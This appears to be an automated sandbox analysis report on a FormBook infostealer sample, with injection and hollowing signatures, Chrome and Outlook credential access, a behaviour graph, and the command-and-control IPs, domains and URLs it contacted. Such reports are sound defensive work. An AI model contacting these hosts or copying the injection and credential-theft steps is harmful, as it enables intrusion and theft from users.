Source: C:\Windows\explorer.exe Domain query: www.ope-cctv.com
Source: C:\Windows\explorer.exe Domain query: www.dersameh.com
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 1010000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\NHYGUnNN.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\NHYGUnNN.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\NHYGUnNN.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AB0008 Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\NHYGUnNN.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\NHYGUnNN.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 3452 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 3452 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\NHYGUnNN.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe Jump to behavior
Source: explorer.exe, 00000002.00000000.274805423.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.295428852.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.241334039.0000000001080000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: XProgram Manager
Source: explorer.exe, 00000002.00000000.304298844.000000000835D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.253031171.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.274805423.0000000001080000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.295428852.0000000001080000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager (Not Responding)
Source: explorer.exe, 00000002.00000000.274805423.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.295111764.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.274166451.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.274805423.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.295428852.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.241334039.0000000001080000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\NHYGUnNN.exe Queries volume information: C:\Users\user\Desktop\NHYGUnNN.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NHYGUnNN.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\NETSTAT.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 756156 Sample: NHYGUnNN.exe Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 34 Snort IDS alert for network traffic 2->34 36 Malicious sample detected (through community Yara rule) 2->36 38 Multi AV Scanner detection for submitted file 2->38 40 4 other signatures 2->40 8 NHYGUnNN.exe 1 2->8         started        process3 file4 22 C:\Users\user\AppData\...22HYGUnNN.exe.log, CSV 8->22 dropped 50 Writes to foreign memory regions 8->50 52 Allocates memory in foreign processes 8->52 54 Injects a PE file into a foreign processes 8->54 12 RegSvcs.exe 8->12         started        signatures5 process6 signatures7 56 Modifies the context of a thread in another process (thread injection) 12->56 58 Maps a DLL or memory area into another process 12->58 60 Sample uses process hollowing technique 12->60 62 Queues an APC in another process (thread injection) 12->62 15 explorer.exe 12->15 injected process8 dnsIp9 24 www.y31jaihdb6zm87.buzz 154.209.6.241, 49721, 49722, 49723 YISUCLOUDLTD-AS-APYISUCLOUDLTDHK Seychelles 15->24 26 www.dersameh.com 89.31.143.1, 49715, 49716, 49717 QSC-AG-IPXDE Germany 15->26 28 4 other IPs or domains 15->28 30 System process connects to network (likely due to code injection or exploit) 15->30 32 Uses netstat to query active network connections and open ports 15->32 19 NETSTAT.EXE 13 15->19         started        signatures10 process11 signatures12 42 Tries to steal Mail credentials (via file / registry access) 19->42 44 Tries to harvest and steal browser information (history, passwords, etc) 19->44 46 Modifies the context of a thread in another process (thread injection) 19->46 48 Maps a DLL or memory area into another process 19->48
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
38.55.236.89
 www.ope-cctv.com United States
174 COGENT-174US true
89.31.143.1
 www.dersameh.com Germany
15598 QSC-AG-IPXDE true
172.67.148.132
 www.canadianlocalbusiness.com United States
13335 CLOUDFLARENETUS true
54.38.220.85
 www.darkchocolatebliss.com France
16276 OVHFR true
162.213.255.142
 www.marketmall.digital United States
22612 NAMECHEAP-NETUS true
154.209.6.241
 www.y31jaihdb6zm87.buzz Seychelles
136970 YISUCLOUDLTD-AS-APYISUCLOUDLTDHK true

Contacted Domains

Name IP Active
www.darkchocolatebliss.com 54.38.220.85 true
www.marketmall.digital 162.213.255.142 true
www.canadianlocalbusiness.com 172.67.148.132 true
www.y31jaihdb6zm87.buzz 154.209.6.241 true
www.ope-cctv.com 38.55.236.89 true
www.dersameh.com 89.31.143.1 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.y31jaihdb6zm87.buzz/4u5a/ true
  • Avira URL Cloud: safe
 unknown
http://www.marketmall.digital/4u5a/?GFQD=d2J0s&l0GX=+3a19pWtZng4d4VWOC/6zX+Mtu8c5OpbMBerEkzVlILtG/Qx1KaY9rLPGpDSvmBGoypiYd46AJSA/qrnjKpXW0Tn6YTEKB73Lei52b2L1E6m true
  • Avira URL Cloud: safe
 unknown
http://www.ope-cctv.com/4u5a/?GFQD=d2J0s&l0GX=PpVjBZYmN65mN/Cch5R9AL0rcoAD1LxI4sTzWlpX/jy1IrupfQnyd2YG9N8O4SbWoFYU5LvyeEtp38I885KIODFzvvn/7iZ+w1zSOWQrPDed true
  • Avira URL Cloud: safe
 unknown
http://www.dersameh.com/4u5a/?l0GX=DO8SLO7p+ieBn2EC0oYIAc7qa4Xo4oKKhL6K9ytUp3CH+6ohEz4QzFDvrvyjA4KB81/r5tutyqTX+rvP+Yb6ZUWqEETpfEhrV3qJRCQNMeQd&GFQD=d2J0s true
  • Avira URL Cloud: safe
 unknown
http://www.marketmall.digital/4u5a/ true
  • Avira URL Cloud: safe
 unknown
www.needook.com/4u5a/ true
  • Avira URL Cloud: safe
 low
http://www.darkchocolatebliss.com/4u5a/?GFQD=d2J0s&l0GX=pzMeEw2CLp9onsoEnnWxz7DjwWrmiPcXMIcMx0e8RMBYp3cHCqEf8wLsuyWBJtbijuVM0Zvb5p08kUy+wXRBHzYlQdhpzNTGfYmB4954z6O2 true
  • Avira URL Cloud: safe
 unknown
http://www.y31jaihdb6zm87.buzz/4u5a/?l0GX=odL+ljtDJZnnvHXGVqz6MYcHTNNFW2XRvrcwy4k99/9PUVuyA+q7lKaiZ8dF4agdsl/xXcCsqSWGiuLBWKJZJi8UVH1n7ApvhveD6637F7nt&GFQD=d2J0s true
  • Avira URL Cloud: safe
 unknown
http://www.dersameh.com/4u5a/ true
  • Avira URL Cloud: safe
 unknown
http://www.darkchocolatebliss.com/4u5a/ true
  • Avira URL Cloud: safe
 unknown